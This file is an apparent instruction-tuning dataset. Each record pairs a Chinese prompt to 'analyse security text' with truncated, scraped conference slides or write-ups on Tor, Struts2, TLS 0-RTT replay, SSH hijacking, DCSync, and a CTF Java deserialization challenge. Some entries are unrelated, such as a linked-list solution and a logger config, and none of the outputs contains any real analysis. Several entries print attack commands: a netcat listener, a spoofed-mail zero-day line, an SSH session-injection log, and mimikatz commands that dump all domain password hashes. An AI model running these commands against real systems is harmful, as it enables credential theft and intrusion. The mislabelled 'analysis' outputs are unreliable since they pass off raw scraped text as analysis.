/tmp/g\" self.event.set() except socket.error: return def getOf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWe have you by the gadgets Hitting your OS below the belt Legal Notice Our opinion is our own. It DOES NOT IN ANY WAY represent the view of our employers. whoami - Toby whoami - Mickey Agenda  Who we are  What are Gadgets o A little bit of history o Why this matters o How to develop gadgets o Gadget security model  What's wrong with them  Attack Surface  Problems found  Demos  What do you do about it? Thank you: Itzik Kotler, FX, Ian Amit, Jayson Street, SophSec, Wim Remes, Aviv Raff, Gal Diskin #include <full_list.h> What are Gadgets  Little applications that run on your Windows desktop  For instance: A little bit of history  Windows XP - Concept first introduced as \"Active Desktop\" o Allowed you to put updating content on your desktop.  Vista - Sidebar introduced, first mention of \"gadgets\" o Gadgets ran in the sidebar \"container\" couldn't be placed randomly on the desktop  Windows 7 - significant changes o Improvements in management: o Gadgets now can be anywhere on the desktop o All gadgets run in a single process o Addition of the enterprise security features o Also - New stuff to help in development Why this still matters  Gadget use is in decline  But! This style of app development is taking off o Container-based apps for smartphones that allow you to do all your dev in HTML, XML, Javascript, etc Windows Vista Sidebar Windows 7 Gadgets Creating Gadgets  Just a zip file Creating Gadgets  Usually just a web app o html o css o javascript o gadget specific manifest file  Can also be WPF or Silverlight Gadget Security Model MSFT provides a detailed explanation o (see references)  Code signing is possible but not required  Prompt for install similar to standard applications: Gadget Security Model  Most similar to HTA - HTML Applications  Basically run in \"Local Machine Zone\" with some differences: o Can instantiate any installed ActiveX object o UAC  Runs as standard user even if the user is part of the admin group  Can't raise UAC prompts BUT! apps launched by a g", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nh\"p://Irongeek.com0 Adrian0Crenshaw0 h\"p://Irongeek.com0 ! I0run0Irongeek.com0 ! I0have0an0interest0in0InfoSec0 educa=on0 ! I0dont0know0everything0@0Im0just0a0 geek0with0=me0on0my0hands0 ! Sr.0Informa=on0Security0Consultant0 at0TrustedSec0 ! Co@Founder0of0Derbycon0 h\"p://www.derbycon.com000 Twitter: @Irongeek_ADC h\"p://Irongeek.com0 ! I0will0be0taking0two0perspec=ves0 \" People0trying0to0stay0anonymous0 \" People0trying0to0de@anonymize0users0 ! Im0not0really0a0privacy0guy0 ! IANAL0 ! Be0careful0where0you0surf,0contraband0awaits0 h\"p://Irongeek.com0 h\"p://Irongeek.com0 Darknets0 ! There0are0many0defini=ons,0but0mine0is0 anonymizing0private0network00 ! Use0of0encryp=on0and0proxies0(some0=mes0other0 peers)0to0obfuscate0who0is0communica=ng0to0 whom0 ! Some=mes0referred0to0as0Cipherspace00 (love0that0term)0 h\"p://Irongeek.com0 The0Onion0Router0 h\"p://Irongeek.com0 ! Who?0 First0the0US0Naval0Research0Laboratory,0then0the0EFF0and0now0the0Tor0Project0 (501c300non@profit).0 h\"p://www.torproject.org/00 ! Why?0 Tor0is0free0so[ware0and0an0open0network0that0helps0you0defend0against0a0form0 of0network0surveillance0that0threatens0personal0freedom0and0privacy,0 confiden=al0business0ac=vi=es0and0rela=onships,0and0state0security0known0as0 traffic0analysis.0~0As0defined0by0their0site0 ! What?0 Access0normal0Internet0sites0anonymously,0and0Tor0hidden0services.00 ! How?0 Locally0run0SOCKS0proxy0that0connects0to0the0Tor0network.0 h\"p://Irongeek.com0 ! Layered0encryp=on0 ! Bi@direc=onal0tunnels0 ! Has0directory0servers0 ! Mostly0focused0on0out0proxying0to0the0Internet0 ! More0info0at0h\"ps://www.torproject.org00 Internet Server Directory Server h\"p://Irongeek.com0 h\"p://Irongeek.com0 Image from http://www.torproject.org/hidden-services.html.en h\"p://Irongeek.com0 Image from http://www.torproject.org/hidden-services.html.en h\"p://Irongeek.com0 Image from http://www.torproject.org/hidden-services.html.en h\"p://Irongeek.com0 Image from http://www.torproject.org/hidden-services.html.en h\"p://Irongeek.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStruts2 组件安全概览 (Skay) Skay@Ateam 组件概述 1.关键词 框架MVCJava Web 2.概述 struts2是基于MVC设计模式的Java Web框架技术之struts2框架按照MVC的设计思想把 Java Web应程序分为控制层包括核控制器FilterDispatcher和业务控制器Action模型 层包括业务逻辑组件和数据库访问组件视图层包括HTMLJSPstruts2标签等也 可以认为struts是个的servlet 关于Xwork XWork是个标准的Command模式实现并且完全从web层脱离出来Xwork提供了很多核 功能前端拦截机interceptor运时表单属性验证类型转换强的表达式语 OGNL  the Object Graph NavigationLanguageIoCInversion of Control反转控 制容器等 3.使范围及业分布 Struts 2 作为个开发框架被泛于Java Web项开发Fofa 络资产搜索引擎 查询 数量4,558,466 语法app=\"Struts2\" 环境搭建动态调试 全部环境上传 https://github.com/0linlin0/Struts2_Vul_Debug 参考https://xz.aliyun.com/t/2672 新建Java Web项 WEB-INF下新建lib录 将struts相关依赖包放http://archive.apache.org/dist/struts/b inaries/struts-2.0.1-all.zip 修改web.xml 修改index.jsp <?xml version=\"1.0\" encoding=\"UTF-8\"?> 1 <web-app xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://xmlns.jcp.org/xml/ns/javaee\" xsi:schemaLocation=\"http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd\" id=\"WebApp_ID\" version=\"3.1\"> 2 <display-name>S2-001 Example</display-name> 3 <filter> 4 <filter-name>struts2</filter-name> 5 <filter- class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class> 6 </filter> 7 <filter-mapping> 8 <filter-name>struts2</filter-name> 9 <url-pattern>/*</url-pattern> 10 </filter-mapping> 11 <welcome-file-list> 12 <welcome-file>index.jsp</welcome-file> 13 </welcome-file-list> 14 </web-app> 15 <%@ page language=\"java\" contentType=\"text/html; charset=UTF-8\" 1 pageEncoding=\"UTF-8\"%> 2 <%@ taglib prefix=\"s\" uri=\"/struts-tags\" %> 3 <!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\"> 4 <html> 5 <head> 6 <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"> 7 <title>S2-001</title> 8 新建welcom.jsp 建Action </head> 9 <body> 10 <h2>S2-001 Demo</h2> 11 <p>link: <a href=\"https://cwiki.apache.org/confluence/display/WW/S2- 001\">https://cwiki.apache.org/confluence/display/WW/S2-001</a></p> 12 <s:form action=\"login\"> 13 <s:textfield name=\"username\" ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"SYSTEMD\\-ESCAPE\" \"1\" \"\" \"systemd 231\" \"systemd-escape\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" systemd-escape \\- 转义与还原单元名称中的特殊字符 .SH \"SYNOPSIS\" .HP \\w'\\fBsystemd\\-escape\\fR\\ 'u \\fBsystemd\\-escape\\fR [OPTIONS...] [STRING...] .SH \"描述\" .PP \\fBsystemd\\-escape\\fR 可用于 转义单元名称中的特殊字符 也可用于还原操作 .PP 可以在命令行上指定任意数量的字符串 表示依次分别处理它们 处理结果将使用空格分隔 .PP 默认的行为是转义操作 但若使用了 \\fB\\-\\-unescape\\fR 选项 则表示反向的还原操作如果使用了 \\fB\\-\\-mangle\\fR 选项 则会使用一种特殊的转义规则 也就是假定字符串已经经过了转义 仅转义那些显而易见必须转义的字符 .SH \"选项\" .PP 能够识别的命令行选项如下 .PP \\fB\\-\\-suffix=\\fR .RS 4 在输出结果尾部添加一个单元类型后缀 必须是 \"\\&.service\" 或 \"\\&.mount\" 这样实际有效的后缀不能与 \\fB\\-\\-template=\\fR, \\fB\\-\\-unescape\\fR , \\fB\\-\\-mangle\\fR 选项一起使用 .RE .PP \\fB\\-\\-template=\\fR .RS 4 将转义之后的结果插入一个单元名称模版 接收一个类似 foobar@\\&.service 这样的模版名 不能与 \\fB\\-\\-suffix=\\fR, \\fB\\-\\-unescape\\fR, \\fB\\-\\-mangle\\fR 选项一起使用 .RE .PP \\fB\\-\\-path\\fR, \\fB\\-p\\fR .RS 4 在转义或还原字符串时 假定其是一个文件系统路径 这将会对字符串头的 \"/\" 字符进行特殊处理 .RE .PP \\fB\\-\\-unescape\\fR .RS 4 将已经转义过的字符串还原 不能与 \\fB\\-\\-suffix=\\fR, \\fB\\-\\-template=\\fR, \\fB\\-\\-mangle\\fR 选项一起使用 .RE .PP \\fB\\-\\-mangle\\fR .RS 4 与 \\fB\\-\\-escape\\fR 类似 但是仅转义那些显而易见必须转义的字符 并且允许自动添加适当的单元类型后缀 不能与 \\fB\\-\\-suffix=\\fR, \\fB\\-\\-template=\\fR, \\fB\\-\\-", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPLAYBACK: A TLS 1.3 STORY WHO ARE WE? Alfonso García Alguacil Alejo Murillo Moya INTRODUCING TLS 1.3 The Good  KISS  Only 5 ciphers supported INTRODUCING TLS 1.3 The Good  No vulnerable to the attacks impacting previous versions INTRODUCING TLS 1.3 The Good  Welcome Forward Secrecy INTRODUCING TLS 1.3 The Good  Formal security analysis performed to the protocol INTRODUCING TLS 1.3 The Good  Traffic inspection not as easy as it is currently done INTRODUCING TLS 1.3 The Bad  Protocol tainted due to compatibility issues INTRODUCING TLS 1.3 The Ugly  0-RTT (this talk ) 0-RTT: SPEED AT A COST VS Your browsers  and CDNs may already be supporting TLS 1.3 0-RTT!  implementations  TLS 1.3 HANDSHAKE TLS 1.3 0-RTT As you can see it may be possible to do REPLAY REPLAY attacks! REPLAY REPLAY REPLAY ANTI-REPLAY PROTECTIONS Single-Use Tickets Single-Use Tickets ANTI-REPLAY PROTECTIONS Single-Use Tickets Single-Use Tickets Client-Hello Recording ANTI-REPLAY PROTECTIONS Single-Use Tickets Single-Use Tickets Client-Hello Recording Freshness checks ANTI-REPLAY PROTECTIONS Single-Use Tickets Single-Use Tickets Client-Hello Recording Freshness checks Application profiles ANTI-REPLAY PROTECTIONS Application profiles Single-Use Tickets Single-Use Tickets Client-Hello Recording Freshness checks Separate API ANTI-REPLAY PROTECTIONS (JUL-2018) Single-Use Tickets CDN 1 Single-Use TIckets Client-Hello Recording Freshness Application Profile 0-RTT not available Different API for handling 0-RTT Other protections 0-RTT only on safe methods 0-RTT only on safe methods, no params BoringSSL 0-RTT without protections ARE THOSE PROTECTIONS ENOUGH? Single-Use Tickets ANATOMY OF AN ATTACK  Vantage point in the network  Browser and server with TLS 1.3 and 0-RTT enabled  GET not being a safe method (a.k.a. RFC meets reality) IMPROVING OUR ATTACK  The browser decides when to send 0-RTT data, which reduces the window for attacks  Could it be possible to control when to send 0-RTT data? IMPROVING OUR ATTACK  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTrust Transience: Post Intrusion SSH Hijacking July 2k5 - Blackhat USA 05 & Defcon 0x0D So you're a sneaky Blackhat... The Target Recon  Mail headers say MUA is PINE  .sig says Debian Sarge, kernel 2.4.22  Web logs show egress HTTPS traffic doesn't go via a proxy (no forwarded-for header) The Plan Let's Do It haxor:~$ nc -l -p 1337 admin@box:~$ id uid=1004(admin) gid=1004(admin) groups=1004(admin) admin@box:~$ ps auxw | grep -q pine || echo shit shit admin@box:~$ ls core core admin@box:~$ uname -nsr Linux box 2.6.11 haxor:~$ ./pine0day | spoofmail -f 'Mr. Mbeki' -s 'Opportunity for joo!' admin@target.com Things start to unravel admin@box:~$ w USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT admin pts/1 :0 09:28 10.3m 3.1s 0.2s bash admin pts/2 :0 09:31 1.0s 1.4s 0.9s bash admin pts/3 haxor.com 14:03 0.0s 0.3s 0.3s w admin@box:~$ ps x 3132 ? S 0:23 xfwm4 -daemon sm-client-id 34235 3590 ? S+ 0:05 xterm -rv 3593 pts/1 Ss+ 0:02 bash 3597 pts/1 S+ 0:12 ssh root@ns1.target.com 9034 ? S+ 0:03 xterm -rv 9036 pts/2 Ss+ 0:02 bash 9154 pts/3 R+ 0:00 ps x +++ATH0  Things have gone pear-shaped  Haven't got root, are about to get busted  Time to drop carrier and run?  But that SSH session, oh so close.  If only there was a way to get to the other end of that SSH... There is a way admin@box:~$ <Ctrl-A>:!!!!mafl-load ssh-jack 3597 haxor.com 1338 Connecting to /usr/bin/ssh running as pid 3597... Connected Ferreting out some useful symbols... Located libc symbol 'socket' at 0xb7e19a50 Located libc symbol 'connect' at 0xb7e195c0 Located libc symbol 'select' at 0xb7e12490 Located section '.got' 0x0807eb8c to 0x0807eef4 Located section '.plt' 0x0804aa68 to 0x0804b7d8 Located section '.text' 0x0804b7e0 to 0x08070450 Located section '.rodata' 0x08070480 to 0x0807dd6c Resolved dynamic symbol 'socket' at PLT: 0x0804b6b8 GOT: 0x0807eea8 Resolved dynamic symbol 'select' at PLT: 0x0804ad88 GOT: 0x0807ec5c Resolved dynamic symbol 'connect' at PLT: 0x0804b5f8 GOT: 0x0807ee78 Locating stub injection poin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWEB 2.0 启发式爬虫实战 猪猪侠 / 2018年06月16日  阿里里云高级安全专家  十一年年安全从业经历  信息安全领域爱好者  自动化安全测试  数据挖掘  微博@ringzero 关于我 为什什么我们需要一个扫描器器爬虫 1 安全测试自动化程度低人工时代 2 大量量的人肉测试重复成本投入 3 被测试系统攻击面被遗漏漏 4 安全测试用例例被遗漏漏 5 WEB 2.0 前端框架导致复杂度增加 AngularReactVue 测试工具使用情况 BURP SUITE 自研工具 被动代理理扫描 黑盒漏漏扫 FUZZER 其他 21.1% 9.9% 11.8% 12.6% 15.3% 29.3% 静态链接分析无结果 BeautifulSoup4 / HTMLParser 现在业界是如何实现爬虫的 正则大法无解 网站特征  Vue.js  JQuery  Handlebars  代码混淆反爬虫  DOM 事件频繁更更新 curl http://www.seebug.org 测试目标 #!/usr/bin/env,python3, #,encoding:,utf-8, import,requests, from,bs4,import,BeautifulSoup, resp,=,requests.get('https://www.seebug.org/'), soup,=,BeautifulSoup(resp.content,,'lxml'), resources,=,{, ,,,,'anchor':,(soup.find_all('a'),,'href'),, ,,,,'iframe':,(soup.find_all('iframe'),,'src'),, ,,,,'frame':,(soup.find_all('frame'),,'src'),, ,,,,'img':,(soup.find_all('img'),,'src'),, ,,,,'link':,(soup.find_all('link'),,'href'),, ,,,,'script':,(soup.find_all('script'),,'src'),, ,,,,'form':,(soup.find_all('form'),,'action'),, }, print(resources) WEB 2.0 动态爬虫应运而生基于无界面浏览器器 #!,/usr/bin/env,python3, #,encoding:,utf-8, import,asyncio, from,pyppeteer,import,launch, async,def,main():, ,,,,browser,=,await,launch(), ,,,,page,=,await,browser.newPage(), ,,,,await,page.goto('http://www.seebug.org'), ,,,,await,page.waitFor(\"body,>,div.footer-up\"), ,,,,urls,=,await,page.evaluate('''(),=>,{, ,,,,,,,,var,urls,=,new,Array();, ,,,,,,,,var,atags,=,document.getElementsByTagName(\"a\");, ,,,,,,,,for(var,i=0;i<atags.length;i++){, ,,,,,,,,,,,,if,(atags[i].getAttribute(\"href\")){, ,,,,,,,,,,,,,,,,urls[i],=,atags[i].getAttribute(\"href\"), ,,,,,,,,,,,,}, ,,,,,,,,}, ,,,,,,,,return,urls;, ,,,,}'''), ,,,,print(urls), ,,,,await,browser.close(), asyncio.get_event_loop().run_until_complete(main()) $pip3,install,pyppeteer https://github.com/miyakogi/pyppeteer Chromium puppeteer pyppeteer 无界面浏览器器历史 QtWebkit Ghost.py PyQt4 PhantomJS CasperJS SlimerJS Chromium Headless 浏览器器 Chrome Firefox Internet Explorer Safari Opera 渲染引擎 Blink Gecko Trident WebKit Blink JS引擎 V8 OdinMonk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMaking (and Hacking) the DEFCON 17 Badge by Joe Grand aka Kingpin Me. electrical engineer. hardware hacker. daddy. Last Year This Year Hackers: The Next Generation Introduction Hardware Firmware Manufacturing DEFCON 17 Haiku Joe Grand aka Kingpin Electronic badge Audio input Affects LED output Sound and light combined Upload new firmware With serial bootloader Voltage reassigned Puzzle of seven Badge-to-badge interfacing Using I2C Hack badge for prizes Clever modifications Can you impress me? A Poem. Microphone RGB LED Freescale DSC & Testpoints  Bootloader  Party Mode  Quiet Mode  Sleep  ??? Badge Operation  Fall 2008: Recover from DEFCON 16  December 2008: Initial design & parts selection  January 2009: Prototype hardware design  February: PCB design completed, production order  March: Production component orders  April: Firmware frozen  May: All components shipped to e-Teknet China  June: Wait for Customs to release the only box containing parts we couldn't easily get duplicates of  July: Badge assembly/test Timeline Customs: China v. UPS FAIL China wins! FedEx gets a small :(, too  Digital Signal Controller  Part of the MC56F8xxx family  Newly released  Freescale gave us alpha samples to begin badge development back in November 2008  Main product page: http://tinyurl.com/lyorks  Direct link to data sheet: www.freescale.com/ files/dsp/doc/data_sheet/MC56F8006.pdf  John Winters, co-designer of this part, is here at DEFCON! Freescale MC56F8006 Freescale MC56F8006 It's Not Easy Picking an LED  AAA3528SURKQBDCGKC09  Rear-mounting  Three individual diodes in single package  200/80/90mcd @ 20mA (R/G/B) Kingbright RGB LED  Dr. Hugh Knowles developed first balanced armature receiver for hearing aids  Developed the first silicon/MEMS microphone in 1988  First moon landing: Neil Armstrong was wearing a Plantronics headset with Knowles microphone  Nearly 1 billion sold  Used in laptops, cellphones, headsets  www.knowles.com Knowles Acoustics Microphone Knowles Acoustics Microph", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env python3 import os, binascii, struct from Crypto.Cipher import AES pad = lambda m: m + bytes([16 - len(m) % 16] * (16 - len(m) % 16)) def haggis(m): crypt0r = AES.new(bytes(0x10), AES.MODE_CBC, bytes(0x10)) return crypt0r.encrypt(len(m).to_bytes(0x10, 'big') + pad(m))[-0x10:] target = os.urandom(0x10) print(binascii.hexlify(target).decode()) msg = binascii.unhexlify(input()) if msg.startswith(b'I solemnly swear that I am up to no good.\\0') \\ and haggis(msg) == target: print(open('flag.txt', 'r').read().strip())", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# you can override this using by setting a system property, for example -Des.logger.level=DEBUG es.logger.level: INFO rootLogger: ${es.logger.level}, console logger: # log action execution errors for easier debugging action: DEBUG # reduce the logging for aws, too much is logged under the default INFO com.amazonaws: WARN appender: console: type: console layout: type: consolePattern conversionPattern: \"[%d{ISO8601}][%-5p][%-25c] %m%n\"", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 25. 合并两个排序的链表 [NowCoder](https://www.nowcoder.com/practice/d8b6b4358f774294a89de2a6ac4d9337?tpId=13&tqId=11169&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/c094d2bc-ec75-444b-af77-d369dfb6b3b4.png\" width=\"400\"/> </div><br> ## 解题思路 ### 递归 ```java public ListNode Merge(ListNode list1, ListNode list2) { if (list1 == null) return list2; if (list2 == null) return list1; if (list1.val <= list2.val) { list1.next = Merge(list1.next, list2); return list1; } else { list2.next = Merge(list1, list2.next); return list2; } } ``` ### 迭代 ```java public ListNode Merge(ListNode list1, ListNode list2) { ListNode head = new ListNode(-1); ListNode cur = head; while (list1 != null && list2 != null) { if (list1.val <= list2.val) { cur.next = list1; list1 = list1.next; } else { cur.next = list2; list2 = list2.next; } cur = cur.next; } if (list1 != null) cur.next = list1; if (list2 != null) cur.next = list2; return head.next; } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nopen 0x00 open 0x01 open https://www.baidu.com//System/Applications/Maps.app mapsapp 1. maps.app 2. urlmaps open \"https://www.baidu.com/System/Applications/Calendar.app\" calendar urlurlcalendar 0x02 app 1. appurl 2. appurl app open \"https://xxxxx\" open \"/Applications/Safari.app\" \"http://xxxxx\" xxx app applemusic! 10000 open /Applications/Safari.app \"http://127.0.0.1:10000/System/Applications/Music.app\" apple music10000 music.appmp3 1. http 2. /System/Applications/mp3 3. mp3Music.app mp3 applemusic 0x03 http musicmp3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: nbtscan-unixwiz categories: Information Gathering tags: [nbtscan-unixwiz,information gathering,netbios,kali linux,recon,enumeration] date: 2017-04-24 13:34:00 --- 0x00 介绍 ------- 一个在本地或远程TCP/IP网络上扫描开放的NETBIOS名称服务器的命令行工具它基于Windows系统的nbtstat工具的功能实现但它可在许多地址上运行而不是仅一个地址 <!--more--> [主页][1] | [仓库][2] - 作者Steve Friedl - 证书public-domain 0x01 功能 ------- NBTSCAN-unixwiz - 开放NETBIOS名称服务器扫描器 ``` root@kali:~# nbtscan-unixwiz nbtscan 1.0.35 - 2008-04-08 - http://www.unixwiz.net/tools/ 用法: nbtscan-unixwiz [选项] 目标 [目标...] 目标可以是IP地址DNS名称或地址的列表范围 范围可以表示成192.168.12.0/24或192.168.12.64-97 -V 显示版本信息 -f 显示完整的NBT资源记录响应(推荐) -H 生成HTTP请求头 -v 开启详细输出调试 -n 不查找响应IP地址的反向名称 -p <n> 绑定UDP端口(默认0) -m 响应中包含MAC地址 (等同'-f') -T <n> 超时不响应 (默认2秒) -w <n> 次写入后等待秒数 (默认10ms) -t <n> 每个地址尝试次数(默认1次) -P 以perl的hashref格式生成结果 ``` 0x02 示例 ------- 扫描一系列IP地址192.168.0.100-110而不进行反向名称查找-n ``` root@kali:~# nbtscan-unixwiz -n 192.168.0.100-110 192.168.0.105 WORKGROUP\\RETROPIE SHARING *timeout (normal end of scan) ``` 扫描单个IP地址192.168.0.38并显示完整的NBT资源记录响应-f ``` root@kali:~# nbtscan-unixwiz -f 192.168.0.38 192.168.0.38 WORKGROUP\\DOOKOSSEL SHARING DOOKOSSEL <00> UNIQUE Workstation Service DOOKOSSEL <03> UNIQUE Messenger Service<3> DOOKOSSEL <20> UNIQUE File Server Service ..__MSBROWSE__.<01> GROUP Master Browser WORKGROUP <00> GROUP Domain Name WORKGROUP <1d> UNIQUE Master Browser WORKGROUP <1e> GROUP Browser Service Elections 00:00:00:00:00:00 ETHER ``` 视频演示[https://asciinema.org/a/104243][3] [1]: http://unixwiz.net/tools/nbtscan.html [2]: http://git.kali.org/gitweb/?p=packages/nbtscan-unixwiz.git;a=tree;h=refs/heads/kali/master;hb=refs/heads/kali/master [3]: https://asciinema.org/a/104243", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1003-006-windows-基于DCsync凭证获取 ## 来自ATT&CK的描述 攻击者可能会通过滥用Windows域控制器的应用程序编程接口API来访问凭据和其他敏感信息从而使用称为DCSync的技术来模拟来自远程域控制器的复制过程 域控制器上的AdministratorsDomain Admins和Enterprise Admin组或计算机帐户的成员能够运行DCSync来从Active Directory中提取密码数据其中可能包括潜在有用帐户例如KRBTGT和管理员然后这些散列又可以用于创建黄金票证以用于传递票证 或更改 帐户操作中所述的帐户密码 DCSync功能已被列入lsadump模块中MimikatzLsadump还包括NetSync它通过旧版复制协议执行DCSync ### DCsync DCSync 是一种后期杀伤链攻击允许攻击者模拟域控制器DC的行为以便通过域复制检索密码数据一旦攻击者可以访问具有域复制权限的特权帐户攻击者就可以利用复制协议来模仿域控制器 ![img](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/uk1Q6x.png) **DCSync** 本身是**Mimikatz**中的一个命令 [它](https://github.com/gentilkiwi/mimikatz) 依赖于利用Microsoft目录复制服务远程协议MS-DRSR中的特定命令来模拟域控制器的行为并要求其他域控制器使用[目录复制服务远程协议](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47)来复制信息 [MS-DRSR](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47)利用这些协议此攻击利用了Active Directory的有效和必要功能无法关闭或禁用它们 ### DCsync攻击原理 一般来说DCSYNC攻击的工作方式如下 1. 发现域控制器以请求复制 2. 使用[GetNCChanges](https://wiki.samba.org/index.php/DRSUAPI) 函数请求用户复制  3. DC将复制数据返回给请求者包括密码哈希值 ![img](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/uk1ttH.gif) DCSync的经典用例是作为[Golden Ticket](https://attack.stealthbits.com/how-golden-ticket-attack-works) 攻击的前身因为它可用于检索KRBTGT HASH ### 所需权限 值得注意的是为了执行此攻击需要一些非常特权的权限这就是为什么这种攻击被归类为在杀伤链攻击的后期发生的原因并且攻击者通常需要一些时间才能获得这些权限 通常管理员域管理员企业管理员拥有所需的权限但更具体地说需要以下权限 - 复制目录更改 - 复制目录全部更改 - 在筛选集中复制目录更改 ## 测试案例 DCSync是mimikatz在2015年添加的一个功能由Benjamin DELPY gentilkiwi和Vincent LE TOUX共同编写能够用来导出域内所有用户的hash. **利用条件** 获得以下任一用户的权限 - Administrators组内的用户 - Domain Admins组内的用户 - Enterprise Admins组内的用户 - 域控制器的计算机帐户 利用DRS(Directory Replication Service)协议通过IDL_DRSGetNCChanges从域控制器复制用户凭据 ### 1.使用mimikatz 导出域内所有用户的hash ```dos mimikatz.exe privilege::debug \"lsadump::dcsync /domain:abcc.org /all /csv\" exit ``` 导出域内administrator帐户的hash ```dos mimikatz.exe privilege::debug \"lsadump::dcsync /domain:abcc.org /user:administrator /csv\" exit ``` #### 2.powershell实现 通过Invoke-ReflectivePEin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022MRCTF-Java部分 2022MRCTF-Java部分 总结 Springcoffee -- Kryo反序列化绕Rasp 思路分析 具体利过程(Payload构造过程) 绕Rasp EzJava -- Bypass Serialkiller 解读环境 Bypass FactoryTransformer Java_mem_shell_Filter Java_mem_shell_Basic 总结 总的来说是次常不错的赛这也会简单列出考点便查阅学习不难有点引导性质 Ps此次赛都是不出所以都需要内存马内存马部分不做讲解很简单百度搜搜 下这两题挺不错的也学到了东西题做了备份核代码(exp)也放到了git仓库备份本 篇只是思路帖 https://github.com/Y4tacker/CTFBackup/tree/main/2022/2022MRCTF Springcoffee--Kryo反序列化绕Rasp EzJava--绕Serialkiller名单中cc关键组件 下这两题没啥参考价值不过让我搞了下实战也还不错 Java_mem_shell_Filter--log4j2打jndi Java_mem_shell_Basic---tomcat弱令 Springcoffee -- Kryo反序列化绕Rasp ok这东西也是从来没学过又是从头开始这记录了当时是如何思考的分析思考过程 思路分析 先看看整体录结构 这挑个重要的来讲下 CoffeeController order路由反序列化 @RequestMapping({\"/coffee/order\"}) public Message order(@RequestBody CoffeeRequest coffee) { if (coffee.extraFlavor != null) { ByteArrayInputStream bas = new ByteArrayInputStream(Base64.getDecoder().decode(coffee.extraFlavor)); Input input = new Input(bas); ExtraFlavor flavor = (ExtraFlavor)this.kryo.readClassAndObject(input); return new Message(200, flavor.getName()); demo路由主要是根据输修改些关键配置这个较关键之后再说 @RequestMapping({\"/coffee/demo\"}) public Message demoFlavor(@RequestBody String raw) throws Exception { System.out.println(raw); JSONObject serializeConfig = new JSONObject(raw); if (serializeConfig.has(\"polish\") && serializeConfig.getBoolean(\"polish\")) { this.kryo = new Kryo(); Method[] var3 = this.kryo.getClass().getDeclaredMethods(); int var4 = var3.length; for(int var5 = 0; var5 < var4; ++var5) { Method setMethod = var3[var5]; if (setMethod.getName().startsWith(\"set\")) { try { Object p1 = serializeConfig.get(setMethod.getName().substring(3)); if (!setMethod.getParameterTypes() [0].isPrimitive()) { try { p1 = Class.forName((String)p1).newInstance(); setMethod.invoke(this.kryo, p1); } catch (Exception var9) { var9.printStackTrace(); } } else { setMethod.invoke(this.kryo, p1); } } catch (Exception var10) { } } } } ByteArrayOutputStream bos = new ByteArrayOutputStream(); Output output = new Output(bos); 先要解决这道题我们得知道前都有些什么研究 通过歌简单搜索可以", "category": "text_analysis", "source": "security_papers"}
